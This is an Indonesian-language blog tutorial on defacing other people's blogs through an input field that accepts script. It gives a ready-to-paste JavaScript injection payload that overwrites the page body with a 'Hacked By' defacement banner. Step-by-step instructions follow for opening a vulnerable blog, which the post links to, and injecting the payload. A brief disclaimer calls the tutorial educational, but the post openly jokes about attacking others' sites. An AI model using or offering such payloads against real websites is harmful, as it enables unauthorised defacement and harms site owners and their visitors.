Baca Juga


Halo sobat Techno . Apa kabarnya nih ??? mudah mudahan dalam keadaan sehat semua ya . Dalam kesempatan kali ini saya akan membagikan caranya Deface Blog , ya tentunya blog orang lain dong hehehe .

Cara deface Blog

Ingat sob tutorial ini hanya sebatas pengetahuan bagi kita semua yang mempunyai dan mengelola halaman blog , jadi saya harapkan anda dapat belajar dari celah / bug pada blog seperti yang satu ini .

Dan saya ingin menyampaikan pesan khusus kepada admin blog yang saya menenumakan bug ini , saya harap dapat memperbaikinya segera . Agar blog nya kembali berjalan dengan aman tentunya ;).

Oke langsung saja kita ke bandara halim kusuma :v . Langsung saja ke pokok pembahasannya masksud saya hehehe .

Alat dan bahan :

1. Laptop atau komputer 
2. Blog yang di pembukaannya meminta input / seperti input nama
3. Script nya anda dapat mengedit script ini ;)
---------------------------------------------------------------------
<script>document.body.innerHTML="<h1>Hacked By Techno-Evolution</h1>
This Site Has been Defaced By : Mr.Lonely-Man<br/>
Greetz To : All Indonesian Underground Community<br/>
Visit http://www.techno-evolutioner.blogspot.com";</script>
---------------------------------------------------------------------

Proses :

1. Langkah yang pertama sudah pasti hidupkan alat tempur kita , yaitu laptop atau pc anda jangan anda hidupkan pc orang ntar kebablasan loh :v .

2. Buka blog yang sudah siap di inject , disini saya menggunakan blog dengan alamat ini ==> Click Disini 

3. Setelah kebuka blognya langsung masukkan script diatas tadi

4. Langsung enter dan lihat hasilnya  


Oke sob cukup mudah kan .. 

Bila ada kritik dan saran , saya tunggu komentar anda ya ;)